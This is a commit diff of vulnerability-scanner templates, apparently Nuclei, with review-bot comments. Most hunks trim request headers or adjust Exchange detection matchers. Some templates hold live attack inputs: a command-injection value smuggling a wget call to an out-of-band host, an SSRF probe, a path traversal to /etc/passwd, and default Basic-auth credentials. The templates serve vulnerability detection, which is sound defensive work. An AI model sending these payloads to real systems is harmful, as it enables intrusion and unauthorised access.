more updates
parent
3fe4bc5206
commit
3f803deb28
|
@ -12,7 +12,6 @@ requests:
|
|||
- |
|
||||
POST /rest/issueNav/1/issueTable HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
|
||||
Connection: Close
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
X-Atlassian-Token: no-check
|
||||
|
|
|
@ -14,16 +14,12 @@ requests:
|
|||
- |
|
||||
POST /cgi-bin/login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://{{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
|
|
|
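Review bot: The `Origin: http://{{Hostname}}` header in this raw request hard-codes the scheme, so on a target served over HTTPS the Origin no longer matches the URL being requested and the check can fail for reasons unrelated to the device. If that header is among the lines kept (the hunk goes from 16 to 12 lines, but the rendering does not show which four were dropped), I would write it as `Origin: {{BaseURL}}`, the form another template in this same commit already uses. The request body also pins `ipaddr=192.168.1.66` and `hostname=wifi.wavlink.com`; a short YAML comment above the raw block, outside the literal scalar, should say these are placeholder form values. The matcher list continues past the end of the hunk, so the words matched against `interactsh_protocol` are not visible here.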
@ -15,8 +15,6 @@ requests:
|
|||
POST /dfsms/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Connection: close
|
||||
Content-Length: 66
|
||||
|
||||
|
|
|
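Review bot: `Content-Length: 66` is hard-coded in the raw request, which ties the header to one exact body. Any later edit to the body, which lies outside this hunk, would leave the two out of step, and the request would then be truncated or stall on the server, making the template report a miss. The engine normally derives the length from the body for raw requests, so I would delete the line, provided it is still present on the new side. The hunk drops two of the eight lines shown and the rendering does not mark which.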
@ -14,8 +14,6 @@ requests:
|
|||
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
|
||||
reference: |
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
|
|
@ -18,24 +18,12 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
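Review bot: Both raw requests carry an opaque `Authorization: Basic …` value and nothing in the hunk says what it is. The two strings decode to `guest:guest` and `admin:admin`, so a match from this template means the device still accepts a default account as well as serving the `log_download.cgi` path with a traversal in `type`. I would document that with a YAML comment placed above each `- |` entry, for example `# Basic auth below is the default guest:guest account`. It must not go inside the literal block, where it would be sent as part of the request. The `info:` block is outside the hunk, so whether the description and tags already mention the default-credential dependency cannot be confirmed from here. The matcher list under `matchers-condition: and` also continues past the hunk.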
@ -1,23 +0,0 @@
|
|||
id: exchange-login
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange login page
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6739
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/owa/auth/logon.aspx'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -15,7 +15,6 @@ requests:
|
|||
headers:
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: en-US,en;q=0.9,hi;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect
|
|||
|
||||
info:
|
||||
name: Microsoft Exchange Server Detect
|
||||
author: pikpikcu
|
||||
author: pikpikcu,dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
|
||||
description: |
|
||||
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
tags: microsoft,exchange,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/owa/auth/logon.aspx"
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
|
||||
part: all
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- X-Owa-Version
|
||||
- X_Owa_Version
|
||||
|
|
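Review bot: Changing `matchers-condition` from `and` to `or` makes every matcher sufficient on its own. If the `type: status` / `- 200` matcher is still on the new side (the rendering does not mark which lines were removed), any host that answers 200 for `/owa/auth/logon.aspx` is reported as Exchange, including catch-all and soft-404 servers. I would either drop the status matcher from the `or` set or keep `matchers-condition: and`, with the status check plus one content matcher that covers both the version paths and the two `<title>` strings. The regex alternatives such as `/owa/auth/15.2.*` also use unescaped dots, so `15.2` matches more than the literal version prefix; `/owa/auth/15\.2` would be tighter now that the regex can decide a match alone. Separately, the description says the template checks for four CVEs while the visible matchers only fingerprint the login page and version header, so the wording should say a match is a detection, not a vulnerability confirmation.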